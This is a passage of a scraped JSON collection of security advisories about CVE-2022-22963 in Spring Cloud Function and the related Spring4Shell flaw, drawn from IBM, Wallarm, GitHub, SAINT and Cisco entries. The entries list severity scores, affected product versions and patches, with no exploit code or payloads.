\n\n[CVE-2022-22963 - National Vulnerability Database](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963>)\n\n[CVE-2022-22963 - mitre.org](<https://vulners.com/cve/CVE-2022-22963>)\n\n[CVE-2022-22963: Spring Framework RCE via Data Binding on JDK 9+ - vmware.com](<https://tanzu.vmware.com/security/cve-2022-22963>)\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PEW\",\"label\":\"Sterling Order Management\"},\"ARM Category\":[{\"code\":\"a8m0z000000cy00AAA\",\"label\":\"Orders\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T19:47:33", "type": "ibm", "title": "Security Bulletin: Sterling Order Management and Spring vulnerability CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-07-28T19:47:33", "id": "EBFFCC00EDD65F45E051073EAF518CD443503E46CC247513E4B973ECC7C31531", "href": 
"https://www.ibm.com/support/pages/node/6600077", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:54:34", "description": "## Summary\n\nCMIS is affected since it uses SpringFramework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963].\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6 \nCP4BA| 21.0.3 \nCP4BA| 22.0.1 \n \n\n\n## Remediation/Fixes\n\nCMIS has upgraded to SpringFramework version 5.3.18 in the below releases. 
\n \n\n\nProduct| VRMF| Remediation/First Fix \n---|---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6.0| [CMIS 3.0.6-IF2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Other+software/Content+Navigator&release=3.0.6&platform=All&function=all> \"CMIS 3.0.6-IF2\" ) \\- 8/2/2022 \nCP4BA| 21.0.3.0| [CP4BA 21.0.3-IF12](<https://www.ibm.com/support/pages/node/6612563> \"CP4BA 21.0.3-IF12\" ) \\- 9/1/2022 \nCP4BA| 22.0.1.0| [CP4BA 22.0.1-IF2](<https://www.ibm.com/support/pages/node/6612561> \"CP4BA 22.0.1-IF2\" ) \\- 9/2/2022 \n \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T15:36:16", "type": "ibm", "title": "Security Bulletin: CMIS is affected since it uses Spring Framework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-10-18T15:36:16", "id": "5303EB56B374789D2F25DD42CDE200B10A36458869D3BC5FB7882728637FFBF5", "href": 
"https://www.ibm.com/support/pages/node/6830265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:03:09", "description": "## Summary\n\nIBM QRadar SIEM is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. QVM utilizes the Spring Framework to support our Java-backed user interface. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. 
Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nQRadar / QRM / QVM / QRIF / QNI v7.3| 7.3.0 - 7.3.3 Fix Pack 11 \nQRadar / QRM / QVM / QRIF / QNI v7.4| 7.4.0 - 7.4.3 Fix Pack 5 \nQRadar / QRM / QVM / QRIF / QNI v7.5| 7.5.0 - 7.5.0 Update Package 1 \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. 
\n\n**Product**| **Versions**| **Fix** \n---|---|--- \nQRadar / QRM / QVM / QRIF / QNI| 7.3| [7.3.3 Fix Pack 11 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20220517151911INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.3.3 Fix Pack 11 Interim Fix 01\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.4| [7.4.3 Fix Pack 6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.4.3-QRADAR-QRSIEM-20220531120920&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.4.3 Fix Pack 6\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.5| [7.5.0 Update Package 2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.5.0-QRADAR-QRSIEM-20220527130137&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.5.0 Update Package 2\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T17:34:09", "type": "ibm", "title": "Security Bulletin: IBM QRadar SIEM is affected by a remote code execution in Spring Framework (CVE-2022-22963, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-24T17:34:09", "id": "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "href": "https://www.ibm.com/support/pages/node/6598419", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:52", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used for internal services. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.7 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.8 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-10\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:54:28", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-27T14:54:28", "id": "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "href": "https://www.ibm.com/support/pages/node/6570949", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2022-04-06T16:47:27", "description": "**Quick update**\n\n * There are two vulnerabilities: one 0-day in Spring Core which is named Spring4Shell (very severe, exploited in the wild, no CVE yet) and another one in Spring Cloud Function (less severe, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>))\n * Wallarm has rolled out the update to detect and mitigate both vulnerabilities\n * No additional actions are required from the customers when using Wallarm in blocking mode\n * When working in a monitoring mode, consider [creating a virtual patch](<https://docs.wallarm.com/user-guides/rules/regex-rule/#example-block-all-requests-with-the-classmoduleclassloader-body-parameters>)\n\n## **Spring4Shell**\n\nSpring Framework is an extremely popular framework used by Java developers to build modern applications. If you rely on the Java stack it\u2019s highly likely that your engineering teams use Spring. In some cases, it only takes one specially crafted request to exploit the vulnerability.\n\nOn March 29th, 2022, information about the POC 0-day exploit in the popular Java library Spring Core appeared on Twitter. Later it turned out that two RCEs were being discussed and sometimes confused:\n\n * RCE in \"Spring Core\" (Severe, no patch at the moment) - Spring4Shell\n * RCE in \"Spring Cloud Function\" (Less severe, [see the CVE](<https://tanzu.vmware.com/security/cve-2022-22963>))\n\nThe vulnerability allows an unauthenticated attacker to execute arbitrary code on the target system. Within some configurations, it only requires a threat actor to send a specific HTTP request to a vulnerable system. Other configurations may require additional effort and research by the attacker.\n\nAt the time of writing, Spring4Shell is unpatched in the Spring Framework and there is a public proof-of-concept available. 
We see exploits in the wild.\n\n**Wallarm update** \n[Wallarm](<https://www.wallarm.com/>) automatically identifies attempts of the Spring4Shell exploitation and logs these attempts in the Wallarm Console.\n\n**Mitigation** \nWhen using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.\n\nWhen using a monitoring mode, we suggest creating a virtual patch. Feel free to reach out to [support@wallarm.com](<mailto:support@wallarm.com>) if you need assistance.\n\nThe post [Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)](<https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:49:02", "type": "wallarmlab", "title": "Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T01:49:02", "id": "WALLARMLAB:9178CD01A603571D2C21329BF42F9BFD", "href": 
"https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-07-21T20:26:42", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "github", "title": "Spring Cloud Function Code Injection with a specially crafted SpEL as a routing expression", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-14T13:41:39", "id": "GHSA-6V73-FGF6-W5J7", "href": "https://github.com/advisories/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-15T15:52:17", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing 
functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:15:00", "type": "prion", "title": "CVE-2022-22963", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-13T23:15:00", "id": "PRION:CVE-2022-22963", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2023-07-26T12:32:07", "description": "Added: 04/05/2022 \n\n\n### Background\n\n[Spring Cloud Function](<https://spring.io/projects/spring-cloud-function#overview>) abstracts all transport details and infrastructure, allowing developers to keep all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has a remote code execution vulnerability. An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. 
\n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:ACED9607933F401D5B0A59CB25D22B09", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T18:40:39", "description": "Added: 04/05/2022 \n\n\n### Background\n\n[Spring Cloud Function](<https://spring.io/projects/spring-cloud-function#overview>) abstracts all transport details and infrastructure, allowing developers to keep all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has a remote code execution vulnerability. 
An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. \n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:EA21934BE7986CEF27E73EAA38D7EB58", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2023-06-24T08:26:39", "description": "On March 29, 2022, the following critical vulnerability in the Spring Cloud Function Framework affecting releases 3.1.6, 3.2.2, and older unsupported releases was disclosed:\n\nCVE-2022-22963: 
Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nFor a description of this vulnerability, see VMware Spring Framework Security Vulnerability Report [\"https://tanzu.vmware.com/security/cve-2022-22963\"].\n\nCisco's Response to This Vulnerability\n\nCisco assessed all products for impact from CVE-2022-22963. To help detect exploitation of this vulnerability, Cisco has released Snort rules at the following location: Talos Rule SID 59388 [\"https://www.snort.org/rule_docs/1-59388\"]\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:45:00", "type": "cisco", "title": "Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-15T15:31:28", "id": 
